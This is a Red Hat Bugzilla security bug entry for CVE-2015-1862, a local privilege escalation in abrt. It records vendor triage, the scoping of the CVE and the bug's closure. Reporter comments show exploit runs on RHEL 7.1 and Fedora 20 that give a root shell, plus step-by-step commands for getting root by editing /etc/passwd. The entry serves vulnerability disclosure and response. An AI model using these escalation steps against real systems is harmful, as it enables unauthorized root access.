Bug 1211223 (CVE-2015-1862)
| Summary: | CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Vasyl Kaigorodov <vkaigoro> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED NOTABUG | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | unspecified | CC: | aavati, bressers, fweimer, mjc, nlevinki, pablo.iranzo, pasteur, pneedle, rfortier, security-response-team, smohan, ssaha, taviso, vbellur |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | Doc Type: | Bug Fix | |
| Doc Text: |
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
|
Story Points: | --- |
| Clone Of: | Environment: | ||
| Last Closed: | 2015-07-09 05:38:34 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | |||
| Bug Blocks: | 1211224, 1214172 | ||
|
Description
Vasyl Kaigorodov
2015-04-13 10:58:26 UTC
It's not obvious to me that abrt in RHEL7 is not affected, are you sure? I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked. [taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt [taviso@localhost ~]$ /tmp/raceabrt /etc/passwd Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race... Didn't win, trying again! [snip lots of output] Didn't win, trying again! Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race... Didn't win, trying again! Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race... Exploit successful... -rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd [taviso@localhost ~]$ cat /etc/redhat-release Red Hat Enterprise Linux Workstation release 7.1 (Maipo) In case it isn't obvious, you can easily turn this into a root shell like this: $ getent passwd taviso taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash $ vi /etc/passwd $ getent passwd taviso taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash $ su taviso Password: # id uid=0(root) gid=0(root) groups=0(root) exit The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862. It is currently under investigation. Further clarification on previous comments: Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public. Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug related to that particular CVE/flaw. As mentioned above, since namespaces/chroot support in abrt does not exists in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862. Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug: https://bugzilla.redhat.com/show_bug.cgi?id=1211835 http://www.openwall.com/lists/oss-security/2015/04/14/4 These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7 as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user. Statement: Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7 Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported? $ rpm -qf /usr/libexec/abrt-hook-ccpp abrt-addon-ccpp-2.2.2-1.fc20.x86_64 $ cat /etc/fedora-release Fedora release 20 (Heisenbug) $ sysctl kernel.core_pattern kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e And the exploit works: $ gcc newpid.c -o test -static newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp] # warning this file must be compiled with -static ^ $ ./test uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 sh-4.2# Please note: Fedora 20 is now EOL and will not be patched for any flaws. Closing this flaw. |